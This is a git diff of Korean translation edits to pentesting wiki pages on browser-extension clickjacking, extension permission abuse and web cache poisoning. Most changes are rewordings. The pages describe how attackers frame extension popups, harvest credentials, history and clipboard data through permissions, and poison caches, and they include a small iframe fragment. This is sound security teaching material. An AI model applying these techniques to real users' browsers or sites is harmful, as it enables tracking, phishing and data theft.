+  - 경고된 파일의 전체 Chrome 확장 URI.
+  - 파일 유형 (예: 백그라운드 페이지 스크립트, 콘텐츠 스크립트, 브라우저 액션 등).
+  - 취약한 줄이 JavaScript 파일에 있는 경우, 포함된 모든 페이지의 경로와 이 페이지의 유형 및 [web_accessible_resource](https://developer.chrome.com/extensions/manifest/web_accessible_resources) 상태.
+- **콘텐츠 보안 정책 (CSP) 분석기 및 우회 검사기**: 확장의 CSP의 약점을 지적하고 화이트리스트된 CDN 등으로 인해 CSP를 우회할 수 있는 잠재적 방법을 밝힙니다.
 - **알려진 취약한 라이브러리**: [Retire.js](https://retirejs.github.io/retire.js/)를 사용하여 알려진 취약한 JavaScript 라이브러리의 사용 여부를 확인합니다.
-- 확장 프로그램 및 형식화된 버전 다운로드.
-- 원본 확장 프로그램 다운로드.
-- 확장의 아름답게 정리된 버전 다운로드(자동으로 예쁘게 정리된 HTML 및 JavaScript).
+- 확장 및 형식화된 버전 다운로드.
+- 원본 확장 다운로드.
+- 확장의 아름답게 정리된 버전 다운로드 (자동으로 예쁘게 정리된 HTML 및 JavaScript).
 - 스캔 결과의 자동 캐싱, 확장 스캔을 처음 실행할 때는 상당한 시간이 소요됩니다. 그러나 두 번째 실행 시 확장이 업데이트되지 않았다면 결과가 캐시되어 거의 즉시 완료됩니다.
 - 링크 가능한 보고서 URL, 다른 사람에게 tarnish에서 생성된 확장 보고서에 쉽게 링크할 수 있습니다.
 
 ### [Neto](https://github.com/elevenpaths/neto)
 
-Neto 프로젝트는 Firefox 및 Chrome과 같은 잘 알려진 브라우저의 브라우저 플러그인 및 확장의 숨겨진 기능을 분석하고 풀어내기 위해 고안된 Python 3 패키지입니다. `manifest.json`, 지역화 폴더 또는 JavaScript 및 HTML 소스 파일과 같은 관련 리소스에서 이러한 기능을 추출하기 위해 패키지 파일을 압축 해제하는 프로세스를 자동화합니다.
+Neto 프로젝트는 Firefox 및 Chrome과 같은 잘 알려진 브라우저의 브라우저 플러그인 및 확장의 숨겨진 기능을 분석하고 풀어내기 위해 고안된 Python 3 패키지입니다. `manifest.json`, 로컬화 폴더 또는 JavaScript 및 HTML 소스 파일과 같은 관련 리소스에서 이러한 기능을 추출하기 위해 패키지 파일을 압축 해제하는 프로세스를 자동화합니다.
 
 ## 참고 문헌
 
diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
index 94bfae821..7edfd15fe 100644
--- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md
@@ -11,7 +11,7 @@ ClickJacking이 무엇인지 모른다면 확인하세요:
 ../clickjacking.md
 {{#endref}}
 
-확장 프로그램에는 **`manifest.json`** 파일이 포함되어 있으며, 해당 JSON 파일에는 `web_accessible_resources` 필드가 있습니다. [Chrome 문서](https://developer.chrome.com/extensions/manifest/web_accessible_resources)에서는 다음과 같이 설명합니다:
+확장 프로그램에는 **`manifest.json`** 파일이 포함되어 있으며, 해당 JSON 파일에는 `web_accessible_resources` 필드가 있습니다. [Chrome 문서](https://developer.chrome.com/extensions/manifest/web_accessible_resources)에서 이에 대해 다음과 같이 설명합니다:
 
 > 이러한 리소스는 **`chrome-extension://[PACKAGE ID]/[PATH]`** URL을 통해 웹페이지에서 사용할 수 있으며, 이는 **`extension.getURL method`**로 생성할 수 있습니다. 허용된 리소스는 적절한 CORS 헤더와 함께 제공되므로 XHR과 같은 메커니즘을 통해 사용할 수 있습니다.[1](https://blog.lizzie.io/clickjacking-privacy-badger.html#fn.1)
 
@@ -25,14 +25,14 @@ ClickJacking이 무엇인지 모른다면 확인하세요:
 
 ## PrivacyBadger Example
 
-확장 프로그램 PrivacyBadger에서는 `skin/` 디렉토리가 다음과 같이 `web_accessible_resources`로 선언된 것과 관련된 취약점이 확인되었습니다 (원본 [블로그 게시물](https://blog.lizzie.io/clickjacking-privacy-badger.html) 확인):
+확장 프로그램 PrivacyBadger에서 `skin/` 디렉토리가 다음과 같이 `web_accessible_resources`로 선언된 것과 관련된 취약점이 발견되었습니다 (원본 [블로그 게시물](https://blog.lizzie.io/clickjacking-privacy-badger.html) 확인):
 ```json
 "web_accessible_resources": [
 "skin/*",
 "icons/*"
 ]
 ```
-이 구성은 잠재적인 보안 문제를 초래했습니다. 구체적으로, 브라우저에서 PrivacyBadger 아이콘과 상호작용할 때 렌더링되는 `skin/popup.html` 파일이 `iframe` 내에 삽입될 수 있습니다. 이 삽입은 사용자가 "이 웹사이트에 대해 PrivacyBadger 비활성화"를 무심코 클릭하도록 속이는 데 악용될 수 있습니다. 이러한 행동은 PrivacyBadger 보호를 비활성화하여 사용자의 개인 정보를 위협하고, 사용자가 더 많은 추적을 받을 수 있는 상황에 처하게 합니다. 이 취약점의 시각적 시연은 [**https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm**](https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm)에서 제공된 ClickJacking 비디오 예제에서 확인할 수 있습니다.
+이 구성은 잠재적인 보안 문제를 초래했습니다. 구체적으로, 브라우저에서 PrivacyBadger 아이콘과 상호작용할 때 렌더링되는 `skin/popup.html` 파일이 `iframe` 내에 삽입될 수 있습니다. 이 삽입은 사용자가 "이 웹사이트에 대해 PrivacyBadger 비활성화"를 무심코 클릭하도록 속이는 데 악용될 수 있습니다. 이러한 행동은 PrivacyBadger 보호를 비활성화하여 사용자의 개인 정보를 손상시키고, 사용자가 더 많은 추적을 받을 수 있는 위험에 처하게 합니다. 이 취약점의 시각적 시연은 [**https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm**](https://blog.lizzie.io/clickjacking-privacy-badger/badger-fade.webm)에서 제공되는 ClickJacking 비디오 예제를 통해 확인할 수 있습니다.
 
 이 취약점을 해결하기 위해 간단한 해결책이 구현되었습니다: `/skin/*`을 `web_accessible_resources` 목록에서 제거하는 것입니다. 이 변경은 `skin/` 디렉토리의 콘텐츠에 웹 접근 가능한 리소스를 통해 접근하거나 조작할 수 없도록 하여 위험을 효과적으로 완화했습니다.
 
@@ -73,23 +73,23 @@ left: 100px;
 src="chrome-extension://ablpimhddhnaldgkfbpafchflffallca/skin/popup.html">
 </iframe>
 ```
-## Metamask 예제
+## Metamask 예시
 
-A [**ClickJacking에 대한 블로그 게시물은 여기에서 찾을 수 있습니다**](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9). 이 경우, Metamask는 접근하는 데 사용된 프로토콜이 **`https:`** 또는 **`http:`**인지 확인하여 취약점을 수정했습니다 (예: **`chrome:`**가 아님):
+A [**blog post about a ClickJacking in metamask can be found here**](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9). 이 경우, Metamask는 접근하는 데 사용된 프로토콜이 **`https:`** 또는 **`http:`**인지 확인하여 취약점을 수정했습니다 (예: **`chrome:`**가 아님):
 
 <figure><img src="../../images/image (21).png" alt=""><figcaption></figcaption></figure>
 
-**Metamask 확장에서 수정된 또 다른 ClickJacking**은 사용자가 `“web_accessible_resources”: [“inpage.js”, “phishing.html”]` 때문에 페이지가 피싱으로 의심될 때 **허용 목록에 추가하기 위해 클릭**할 수 있었던 것입니다. 해당 페이지가 Clickjacking에 취약했기 때문에 공격자는 피해자가 이를 인식하지 못한 채 허용 목록에 추가하도록 클릭하게 만들기 위해 정상적인 것을 보여줄 수 있었고, 그 후 허용 목록에 추가된 피싱 페이지로 돌아갈 수 있었습니다.
+**Metamask 확장 프로그램에서 수정된 또 다른 ClickJacking**은 사용자가 `“web_accessible_resources”: [“inpage.js”, “phishing.html”]` 때문에 페이지가 피싱으로 의심될 때 **Click to whitelist**할 수 있었던 것입니다. 해당 페이지가 Clickjacking에 취약했기 때문에, 공격자는 피해자가 이를 인식하지 못한 채로 화이트리스트에 추가하도록 클릭하게 만들기 위해 정상적인 것을 보여줄 수 있었고, 그 후 화이트리스트에 추가된 피싱 페이지로 돌아갈 수 있었습니다.
 
-## Steam 인벤토리 헬퍼 예제
+## Steam Inventory Helper 예시
 
-브라우저 확장에서 **XSS**가 **ClickJacking** 취약점과 어떻게 연결되었는지 확인하려면 다음 페이지를 확인하세요:
+다음 페이지를 확인하여 **XSS**가 브라우저 확장 프로그램에서 **ClickJacking** 취약점과 어떻게 연결되었는지 확인하세요:
 
 {{#ref}}
 browext-xss-example.md
 {{#endref}}
 
-## 참고문헌
+## References
 
 - [https://blog.lizzie.io/clickjacking-privacy-badger.html](https://blog.lizzie.io/clickjacking-privacy-badger.html)
 - [https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9)
diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
index 24efed87b..9cb5cbfef 100644
--- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
@@ -39,11 +39,11 @@
 ```
 이것들은 브라우저 확장 프로그램이 자유롭게 접근할 수 있는 호스트입니다. 이는 브라우저 확장 프로그램이 **`fetch("https://gmail.com/")`**를 호출할 때 CORS에 의해 제한되지 않기 때문입니다.
 
-## `permissions` 및 `host_permissions` 악용
+## `permissions` 및 `host_permissions` 악용하기
 
 ### 탭
 
-게다가, **`host_permissions`**는 “고급” [**tabs API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs) **기능을 잠금 해제합니다.** 이들은 확장 프로그램이 [tabs.query()](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/query)를 호출하여 **사용자의 브라우저 탭 목록**을 가져오고 어떤 **웹 페이지(주소 및 제목)가 로드되었는지** 알 수 있게 합니다.
+게다가, **`host_permissions`**는 “고급” [**tabs API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs) **기능을 잠금 해제합니다.** 이들은 확장 프로그램이 [tabs.query()](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/query)를 호출하여 **사용자의 브라우저 탭 목록**을 가져오고 어떤 **웹 페이지(주소 및 제목)가 로드되었는지** 알 수 있게 해줍니다.
 
 > [!CAUTION]
 > 뿐만 아니라, [**tabs.onUpdated**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/onUpdated) **와 같은 리스너도 훨씬 더 유용해집니다.** 이들은 새로운 페이지가 탭에 로드될 때마다 알림을 받습니다.
@@ -52,7 +52,7 @@
 
 콘텐츠 스크립트는 반드시 확장 프로그램 매니페스트에 정적으로 작성될 필요는 없습니다. 충분한 **`host_permissions`**가 주어지면, **확장 프로그램은** [**tabs.executeScript()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/executeScript) **또는** [**scripting.executeScript()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/scripting/executeScript)를 호출하여 동적으로 로드할 수 있습니다.
 
-두 API는 콘텐츠 스크립트로서 확장 프로그램에 포함된 파일뿐만 아니라 **임의의 코드**를 실행할 수 있게 합니다. 전자는 문자열로 JavaScript 코드를 전달할 수 있는 반면, 후자는 주입 취약점에 덜 취약한 JavaScript 함수를 기대합니다. 그럼에도 불구하고, 두 API는 잘못 사용될 경우 큰 혼란을 초래할 수 있습니다.
+두 API는 확장 프로그램에 포함된 파일뿐만 아니라 **임의의 코드**를 콘텐츠 스크립트로 실행할 수 있게 해줍니다. 전자는 문자열로 JavaScript 코드를 전달할 수 있는 반면, 후자는 주입 취약점에 덜 취약한 JavaScript 함수를 기대합니다. 그럼에도 불구하고, 두 API는 잘못 사용될 경우 큰 혼란을 초래할 수 있습니다.
 
 > [!CAUTION]
 > 위의 기능 외에도, 콘텐츠 스크립트는 예를 들어 **웹 페이지에 입력되는 자격 증명을 가로챌 수 있습니다.** 이들을 악용하는 또 다른 고전적인 방법은 **모든 웹사이트에 광고를 주입하는 것입니다.** 뉴스 웹사이트의 신뢰성을 악용하기 위해 **사기 메시지를 추가하는 것**도 가능합니다. 마지막으로, 이들은 **은행 웹사이트를 조작하여** 자금 이체를 우회할 수 있습니다.
@@ -68,22 +68,22 @@
 
 가능한 `tabs.create()` 매개변수를 살펴보면, 그 기능이 `window.open()`이 허용하는 것보다 훨씬 더 넓다는 것을 알 수 있습니다. Firefox는 이 API와 함께 `data:` URI의 사용을 허용하지 않지만, Chrome은 그러한 보호가 없습니다. **최상위에서 이러한 URI의 사용은** [**피싱에 악용되었기 때문에 금지되었습니다**](https://bugzilla.mozilla.org/show_bug.cgi?id=1331351)**.**
 
-[**tabs.update()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/update)는 `tabs.create()`와 매우 유사하지만 **기존 탭을 수정합니다.** 따라서 악의적인 확장 프로그램은 예를 들어 임의로 광고 페이지를 사용자의 탭 중 하나에 로드할 수 있으며, 해당 탭을 활성화할 수도 있습니다.
+[**tabs.update()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/update)는 `tabs.create()`와 매우 유사하지만 **기존 탭을 수정합니다.** 따라서 악의적인 확장 프로그램은 예를 들어 임의로 광고 페이지를 당신의 탭 중 하나에 로드할 수 있으며, 해당 탭을 활성화할 수도 있습니다.
 
-### 웹캠, 지리 위치 및 친구들 <a href="#webcam-geolocation-and-friends" id="webcam-geolocation-and-friends"></a>
+### 웹캠, 지리적 위치 및 친구들 <a href="#webcam-geolocation-and-friends" id="webcam-geolocation-and-friends"></a>
 
-웹사이트가 특별한 권한을 요청할 수 있다는 것을 알고 있을 것입니다. 예를 들어 웹캠(화상 회의 도구)이나 지리적 위치(지도)에 접근하기 위해서입니다. 이는 악용 가능성이 상당한 기능이므로 사용자는 매번 여전히 이를 원한다고 확인해야 합니다.
+웹사이트가 특별한 권한을 요청할 수 있다는 것을 알고 있을 것입니다. 예를 들어, 웹캠(화상 회의 도구)이나 지리적 위치(지도)에 접근하기 위해서입니다. 이는 악용 가능성이 상당한 기능이므로, 사용자는 매번 여전히 이를 원한다고 확인해야 합니다.
 
 > [!CAUTION]
-> 브라우저 확장 프로그램은 그렇지 않습니다. **브라우저 확장 프로그램이** [**웹캠이나 마이크에 접근하고자 할 경우**](https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia)**, 단 한 번만 권한을 요청하면 됩니다.**
+> 브라우저 확장 프로그램은 그렇지 않습니다. **브라우저 확장 프로그램이** [**당신의 웹캠이나 마이크에 접근하고 싶다면**](https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia)**, 단 한 번만 권한을 요청하면 됩니다.**
 
-일반적으로 확장 프로그램은 설치 직후에 이를 요청합니다. 이 프롬프트가 수락되면, **언제든지 웹캠 접근이 가능해집니다.** 사용자가 이 시점에서 확장 프로그램과 상호작용하지 않더라도 가능합니다. 네, 사용자는 확장 프로그램이 정말로 웹캠 접근이 필요할 경우에만 이 프롬프트를 수락할 것입니다. 그러나 그 이후에는 확장 프로그램이 비밀리에 아무것도 녹음하지 않을 것이라고 신뢰해야 합니다.
+일반적으로 확장 프로그램은 설치 직후에 이를 요청합니다. 이 프롬프트가 수락되면, **언제든지 웹캠 접근이 가능해집니다.** 사용자가 이 시점에서 확장 프로그램과 상호작용하지 않더라도 가능합니다. 네, 사용자는 확장 프로그램이 정말로 웹캠 접근이 필요할 때만 이 프롬프트를 수락할 것입니다. 그러나 그 이후에는 확장 프로그램이 비밀리에 아무것도 녹음하지 않을 것이라고 신뢰해야 합니다.
 
-[당신의 정확한 지리적 위치](https://developer.mozilla.org/en-US/docs/Web/API/Geolocation) 또는 [클립보드 내용](https://developer.mozilla.org/en-US/docs/Web/API/Clipboard_API)에 접근하는 경우, 명시적으로 권한을 부여할 필요가 전혀 없습니다. **확장 프로그램은 단순히 `geolocation` 또는 `clipboard`를** [**permissions entry**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions) **에 추가합니다.** 이러한 접근 권한은 확장 프로그램이 설치될 때 암묵적으로 부여됩니다. 따라서 이러한 권한을 가진 악의적이거나 손상된 확장 프로그램은 사용자가 아무것도 눈치채지 못한 채로 당신의 이동 프로필을 생성하거나 복사된 비밀번호를 모니터링할 수 있습니다.
+[당신의 정확한 지리적 위치](https://developer.mozilla.org/en-US/docs/Web/API/Geolocation) 또는 [클립보드 내용](https://developer.mozilla.org/en-US/docs/Web/API/Clipboard_API)에 접근하는 경우, 명시적으로 권한을 부여할 필요가 전혀 없습니다. **확장 프로그램은 단순히 `geolocation` 또는 `clipboard`를** [**permissions entry**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions) **에 추가합니다.** 이러한 접근 권한은 확장 프로그램이 설치될 때 암묵적으로 부여됩니다. 따라서 이러한 권한을 가진 악의적이거나 손상된 확장 프로그램은 당신의 이동 프로필을 생성하거나 복사된 비밀번호를 모니터링할 수 있습니다.
 
 **`history`** 키워드를 확장 프로그램 매니페스트의 [permissions entry](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions)에 추가하면 **`history API`**에 대한 **접근이 허용됩니다.** 이를 통해 사용자의 전체 브라우징 기록을 한 번에 검색할 수 있으며, 사용자가 이러한 웹사이트를 다시 방문할 때까지 기다릴 필요가 없습니다.
 
-**`bookmarks`** **권한**은 유사한 악용 가능성을 가지고 있으며, 이 권한은 **모든 북마크를** [**bookmarks API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/bookmarks)를 통해 읽을 수 있게 합니다.
+**`bookmarks`** **권한**은 유사한 악용 가능성을 가지고 있으며, 이 권한은 **모든 북마크를** [**bookmarks API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/bookmarks) **를 통해 읽을 수 있게 해줍니다.**
 
 ### 저장소 권한 <a href="#the-storage-permission" id="the-storage-permission"></a>
 
@@ -93,17 +93,17 @@
 
 ### 더 많은 권한
 
-여기에서 [**Chromium 브라우저 확장이 요청할 수 있는 권한의 전체 목록을 찾을 수 있습니다**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions) 및 [**Firefox 확장 프로그램에 대한 전체 목록은 여기에서 찾을 수 있습니다**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api_permissions)**.**
+여기에서 [**Chromium 브라우저 확장 프로그램이 요청할 수 있는 권한의 전체 목록을 찾을 수 있습니다**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions) 및 [**Firefox 확장 프로그램에 대한 전체 목록은 여기에서 확인할 수 있습니다**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api_permissions)**.**
 
 ## 예방 <a href="#why-not-restrict-extension-privileges" id="why-not-restrict-extension-privileges"></a>
 
-구글 개발자의 정책은 확장 프로그램이 기능에 필요한 것보다 더 많은 권한을 요청하는 것을 명시적으로 금지하여 과도한 권한 요청을 효과적으로 완화합니다. 브라우저 확장 프로그램이 이 경계를 넘은 사례는 애드온 스토어가 아닌 브라우저 자체와 함께 배포된 경우입니다.
+구글 개발자의 정책은 확장 프로그램이 기능에 필요한 것보다 더 많은 권한을 요청하는 것을 명시적으로 금지하여 과도한 권한 요청을 효과적으로 완화합니다. 브라우저 확장 프로그램이 이 경계를 넘은 사례는 브라우저 자체와 함께 배포된 경우로, 애드온 스토리를 통해서가 아닙니다.
 
-브라우저는 확장 프로그램 권한의 남용을 더욱 억제할 수 있습니다. 예를 들어, 화면 녹화를 위해 사용되는 Chrome의 [tabCapture](https://developer.chrome.com/docs/extensions/reference/tabCapture/) 및 [desktopCapture](https://developer.chrome.com/docs/extensions/reference/desktopCapture/) API는 남용을 최소화하도록 설계되었습니다. tabCapture API는 확장 프로그램 아이콘을 클릭하는 것과 같은 직접적인 사용자 상호작용을 통해서만 활성화될 수 있으며, desktopCapture는 녹화할 창에 대한 사용자 확인을 요구하여 은밀한 녹화 활동을 방지합니다.
+브라우저는 확장 프로그램 권한의 남용을 더욱 억제할 수 있습니다. 예를 들어, Chrome의 [tabCapture](https://developer.chrome.com/docs/extensions/reference/tabCapture/) 및 [desktopCapture](https://developer.chrome.com/docs/extensions/reference/desktopCapture/) API는 화면 녹화를 위해 설계되었으며, 남용을 최소화하도록 되어 있습니다. tabCapture API는 확장 프로그램 아이콘을 클릭하는 것과 같은 직접적인 사용자 상호작용을 통해서만 활성화될 수 있으며, desktopCapture는 녹화할 창에 대한 사용자 확인을 요구하여 은밀한 녹화 활동을 방지합니다.
 
-그러나 보안 조치를 강화하면 종종 확장 프로그램의 유연성과 사용자 친화성이 감소합니다. [activeTab permission](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#activetab_permission)은 이러한 거래를 보여줍니다. 이는 확장 프로그램이 전체 인터넷에 대한 호스트 권한을 요청할 필요를 없애기 위해 도입되었으며, 사용자가 명시적으로 활성화할 경우 현재 탭에만 접근할 수 있도록 합니다. 이 모델은 사용자 주도의 작업이 필요한 확장 프로그램에는 효과적이지만, 자동 또는 사전 조치가 필요한 확장 프로그램에는 부족하여 편의성과 즉각적인 반응성을 저해합니다.
+그러나 보안 조치를 강화하면 종종 확장 프로그램의 유연성과 사용자 친화성이 감소합니다. [activeTab permission](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#activetab_permission)은 이러한 거래를 보여줍니다. 이는 확장 프로그램이 전체 인터넷에 대한 호스트 권한을 요청할 필요를 없애기 위해 도입되었으며, 사용자가 명시적으로 활성화할 때만 현재 탭에 접근할 수 있도록 합니다. 이 모델은 사용자 주도 작업이 필요한 확장 프로그램에는 효과적이지만, 자동 또는 사전 조치가 필요한 경우에는 편의성과 즉각적인 반응성을 저해합니다.
 
-## **참고 문헌**
+## **참고문헌**
 
 - [https://palant.info/2022/08/17/impact-of-extension-privileges/](https://palant.info/2022/08/17/impact-of-extension-privileges/)
 - [https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing](https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing)
diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md
index 8a31c5ae4..2190cbb9b 100644
--- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md
@@ -94,7 +94,7 @@ persistData()
 [...]
 ],
 ```
-특히, **`/html/bookmarks.html`** 페이지는 프레이밍에 취약하여 **clickjacking**에 노출됩니다. 이 취약점은 공격자의 사이트 내에서 페이지를 프레임으로 설정하고, DOM 요소로 오버레이하여 인터페이스를 기만적으로 재설계하는 데 활용됩니다. 이러한 조작은 피해자가 기본 확장과 의도치 않게 상호작용하게 만듭니다.
+특히, **`/html/bookmarks.html`** 페이지는 프레이밍에 취약하여 **clickjacking**에 노출됩니다. 이 취약점은 공격자의 사이트 내에서 페이지를 프레임으로 설정하고, DOM 요소로 덮어씌워 인터페이스를 기만적으로 재설계하는 데 활용됩니다. 이러한 조작은 피해자가 의도치 않게 기본 확장과 상호작용하게 만듭니다.
 
 ## References
 
diff --git a/src/pentesting-web/cache-deception/README.md b/src/pentesting-web/cache-deception/README.md
index 9664238de..063e3ad43 100644
--- a/src/pentesting-web/cache-deception/README.md
+++ b/src/pentesting-web/cache-deception/README.md
@@ -6,12 +6,12 @@
 
 > **웹 캐시 오염과 웹 캐시 기만의 차이점은 무엇인가요?**
 >
-> - **웹 캐시 오염**에서는 공격자가 애플리케이션이 캐시에 악성 콘텐츠를 저장하도록 하며, 이 콘텐츠는 캐시에서 다른 애플리케이션 사용자에게 제공됩니다.
-> - **웹 캐시 기만**에서는 공격자가 애플리케이션이 다른 사용자의 민감한 콘텐츠를 캐시에 저장하도록 하며, 공격자는 이후 이 콘텐츠를 캐시에서 검색합니다.
+> - **웹 캐시 오염**에서는 공격자가 애플리케이션이 캐시에 악성 콘텐츠를 저장하도록 유도하고, 이 콘텐츠가 다른 애플리케이션 사용자에게 캐시에서 제공됩니다.
+> - **웹 캐시 기만**에서는 공격자가 애플리케이션이 다른 사용자의 민감한 콘텐츠를 캐시에 저장하도록 유도하고, 공격자는 이후 이 콘텐츠를 캐시에서 검색합니다.
 
 ## 캐시 오염
 
-캐시 오염은 클라이언트 측 캐시를 조작하여 클라이언트가 예상치 못한, 부분적이거나 공격자가 제어하는 리소스를 로드하도록 강제하는 것을 목표로 합니다. 영향의 정도는 영향을 받는 페이지의 인기 여부에 따라 달라지며, 오염된 응답은 캐시 오염 기간 동안 페이지를 방문하는 사용자에게만 제공됩니다.
+캐시 오염은 클라이언트 측 캐시를 조작하여 클라이언트가 예상치 못한, 부분적이거나 공격자가 제어하는 리소스를 로드하도록 강제하는 것을 목표로 합니다. 영향의 정도는 영향을 받는 페이지의 인기 여부에 따라 달라지며, 오염된 응답은 캐시 오염 기간 동안 해당 페이지를 방문하는 사용자에게만 제공됩니다.
 
 캐시 오염 공격의 실행에는 여러 단계가 포함됩니다:
 
@@ -21,13 +21,13 @@
 
 ### 발견: HTTP 헤더 확인
 
-일반적으로 응답이 **캐시에 저장되었을 때** **그를 나타내는 헤더**가 있을 것입니다. 이 게시물에서 주의해야 할 헤더를 확인할 수 있습니다: [**HTTP 캐시 헤더**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
+일반적으로 응답이 **캐시에 저장되었을 때** **그에 대한 헤더가 표시됩니다**, 이 게시물에서 주의해야 할 헤더를 확인할 수 있습니다: [**HTTP 캐시 헤더**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
 
 ### 발견: 캐시 오류 코드
 
-응답이 캐시에 저장되고 있다고 생각된다면, **잘못된 헤더로 요청을 보내는** 것을 시도해 볼 수 있습니다. 이 경우 **상태 코드 400**으로 응답해야 합니다. 그런 다음 요청을 정상적으로 접근해 보고 **응답이 400 상태 코드**인 경우, 취약하다는 것을 알 수 있습니다(DoS를 수행할 수도 있습니다).
+응답이 캐시에 저장되고 있다고 생각되면, **잘못된 헤더로 요청을 보내는** 것을 시도해 볼 수 있습니다. 이 경우 **상태 코드 400**으로 응답해야 합니다. 그런 다음 요청을 정상적으로 접근해 보고, **응답이 400 상태 코드**인 경우 취약하다는 것을 알 수 있습니다(DoS를 수행할 수도 있습니다).
 
-더 많은 옵션은 다음에서 찾을 수 있습니다:
+더 많은 옵션은 다음에서 확인할 수 있습니다:
 
 {{#ref}}
 cache-poisoning-to-dos.md
@@ -43,33 +43,33 @@ cache-poisoning-to-dos.md
 ```
 ### 백엔드 서버에서 유해한 응답 유도하기
 
-매개변수/헤더가 확인되면 **소독**이 어떻게 이루어지는지와 **어디서** 응답에 **반영**되거나 영향을 미치는지 확인하십시오. 이를 악용할 수 있는 방법이 있습니까? (XSS를 수행하거나 당신이 제어하는 JS 코드를 로드할 수 있습니까? DoS를 수행할 수 있습니까?...)
+식별된 매개변수/헤더가 **어떻게** **정화**되고 **어디서** 응답에 **반영**되거나 영향을 미치는지 확인하십시오. 이를 악용할 수 있는 방법이 있습니까? (XSS를 수행하거나 당신이 제어하는 JS 코드를 로드할 수 있습니까? DoS를 수행할 수 있습니까?...)
 
 ### 응답 캐시 가져오기
 
-악용할 수 있는 **페이지**를 **확인**하고 사용할 **매개변수**/**헤더**와 **악용하는 방법**을 파악한 후, 페이지를 캐시해야 합니다. 캐시에 가져오려는 리소스에 따라 시간이 걸릴 수 있으며, 몇 초 동안 시도해야 할 수도 있습니다.
+악용할 수 있는 **페이지**를 **식별**하고 사용할 **매개변수**/**헤더**와 **악용하는 방법**을 파악한 후, 페이지를 캐시해야 합니다. 캐시에 가져오려는 리소스에 따라 시간이 걸릴 수 있으며, 몇 초 동안 시도해야 할 수도 있습니다.
 
 응답의 헤더 **`X-Cache`**는 요청이 캐시되지 않았을 때 **`miss`** 값을 가질 수 있고, 캐시되었을 때는 **`hit`** 값을 가질 수 있으므로 매우 유용할 수 있습니다.\
-헤더 **`Cache-Control`**은 리소스가 캐시되고 있는지, 다음에 리소스가 다시 캐시될 때를 알기 위해 아는 것이 흥미롭습니다: `Cache-Control: public, max-age=1800`
+헤더 **`Cache-Control`**은 리소스가 캐시되고 있는지, 다음에 리소스가 다시 캐시될 때를 아는 데 흥미롭습니다: `Cache-Control: public, max-age=1800`
 
-또 다른 흥미로운 헤더는 **`Vary`**입니다. 이 헤더는 종종 **캐시 키의 일부로 처리되는 추가 헤더**를 **지시하는 데 사용**되며, 일반적으로 키가 없는 경우에도 해당됩니다. 따라서 사용자가 타겟으로 하는 피해자의 `User-Agent`를 알고 있다면, 특정 `User-Agent`를 사용하는 사용자들을 위해 캐시를 오염시킬 수 있습니다.
+또 다른 흥미로운 헤더는 **`Vary`**입니다. 이 헤더는 종종 **캐시 키의 일부로 처리되는 추가 헤더**를 **지시하는 데 사용**됩니다. 따라서 사용자가 타겟으로 하는 피해자의 `User-Agent`를 알고 있다면, 특정 `User-Agent`를 사용하는 사용자들을 위해 캐시를 오염시킬 수 있습니다.
 
 캐시와 관련된 또 다른 헤더는 **`Age`**입니다. 이는 객체가 프록시 캐시에 있는 시간을 초 단위로 정의합니다.
 
